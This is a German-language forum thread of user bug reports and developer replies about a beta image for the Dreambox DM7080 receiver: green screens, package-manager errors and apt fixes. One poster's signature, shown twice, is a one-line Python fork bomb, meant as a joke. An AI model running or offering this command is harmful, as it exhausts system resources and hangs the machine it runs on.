Angepinnt Feedback/Bugs in beta image DM7080 OE2.2



  • laut deinem crashlog hat jemand oder irgendwas im /var/lib/apt/lists einträge gelöscht das macht der Paketmanager nicht und apt auch nicht und ich weiss das ich hab den geschrieben.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • also ich hab mit dem Update/Image von 19uhr nur noch greens in reihe...! :(

    und das letzte mal Geflasht hatte ich am 17.12. also das ists auch nicht gewesen,

    habe nun Online Recovery Probiert und da nochmal Upgedatet, dann nochmal das heutige Image, und immernoch gs ohne ende, werde wohl ein älteres Flashen, bekomme das nicht gelöst, an den log komme ich nicht ran immom...
  • Seit gestern nur noch GS

    Servus zusammen,
    habe gestern das unstable vom 25.12. 14 Uhr geflasht, die Box fuhr hoch aber bei jeder Installation z.B. CAMs oder Plugins = GS.
    Diese Logs habe ich nicht mit angehängt, da ich auf das neuere von gestern vertraut habe.

    Das neueste habe ich vorhin geflasht : Box startet bis der Balken voll ausgefüllt ist, dann GS. Das hat Sie ca. 30 Mal gemacht, jetzt hängt Sie komplett im GS mit vollem Balken.
    Habe die LOgs angehängt vom ersten heute über ein paar in der Mitte bis zum jetzigen letzten.

    Soll ich besser wieder ein älteres Unstable flashen ?
    Dateien
  • das haengt im moment damit zusammen, dass ihr einen check anhabt, wann der installer/paketmanager nach updates suchen soll.

    bitte einfach per ssh/telnet zur box verbinden und den alten installer entfernen.

    apt-get remove enigma2-plugin-newnigma2-installer
  • Alles klar, ausgeführt.
    Funzt wieder, allerdings läßt sich über den Paketmanager vom Feed, mit Ausnahme CCcam und Oscam nichts installieren.
    bei allem anderen kommt die ominöse Meldung :

    There are problems and -y was used without --force -yes
    Nicht erfolgreich
  • Bin hierbei noch ein ziemlicher Anfänger, was und wo muss man da eingeben.
    TelNet ist klar aber wie starte ich z.B. den Befehl zum installieren von Scam 3.6 im TelNet ?
    Über den Paketmanager geht das ja einfach aber wo werden die Ausgaben dann dargestellt
  • Über TelNet läßt sich das installieren, da kommt gleich eine OK Meldung.
    Wie kann ich dort die Ausgabe kopieren ? Weder Screenshot noch Strg+c funktionieren.

    Leider weiß ich auch immer noch nicht wie man Ausgaben kopiert welche über den Paketmanager gemacht werden.
    apt-cache search newnigma2-camd-scam3.60 ?

    Da kommt bei mir nichts, zusätzlich habe ich noch das Problem, wenn ich im TelNet g eingeben will kommt ein q.
    Über Strg-C hier im Forum und dann rechtsklick im TelNet funktioniert es.
    Andersherum funktioniert das aber nicht.

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von hbf () aus folgendem Grund: Nachtrag: Keine Ahnung warum aber auf einmal funktioniert alles. Download vom Feed einwandfrei. Gibt es den Config Saver in Newnigma nicht mehr ? Muss man dBackup nutzen ? Wenn ja wo kriegt man das ?

  • There are problems and -y was used without --force -yes
    Der feed wird nur jede stunde signiert deswegen mault der die pakete sind noch net signiert.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Ich habe jetzt den alten Installer deinstalliert, aber noch nicht das Image upgedated.

    Wenn ich jetzt die Plugins aufrufen will kommt folgende Meldung: " Einige Plugins sind nicht verfügbar: newnigma2/ConfigSaver ( Noch module named Installer.IpkgStatusScreen)


    Was kann ich tun?

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von savini ()

  • Hallo zusammen,

    habe auf der DM7080HD das Aktuelle Image drauf, habe wie immer
    nur Metrix HD Skin - Mediaportal und dbackup drauf.

    Auf der DM820HD gibt es nie Probleme, bei dem DM7080HD Image aber sehr oft.

    Das Problem Heute, beim umschalten gib es irgendwann Dauerspinner und die Box kommt da nur nach langer Zeit
    wieder raus.

    Es gibt kein Crashlog.

    Der alte Paketmanager ist auch deinstalliert, was könnte das auslösen?
    DM820HDSS - DM500HDS - Telekom Mediareceiver 500Sat SS

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Dreambox7080 ()

  • gab gerade nochmal ein update bezüglich nfs kann es sein das du neu flashen must
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.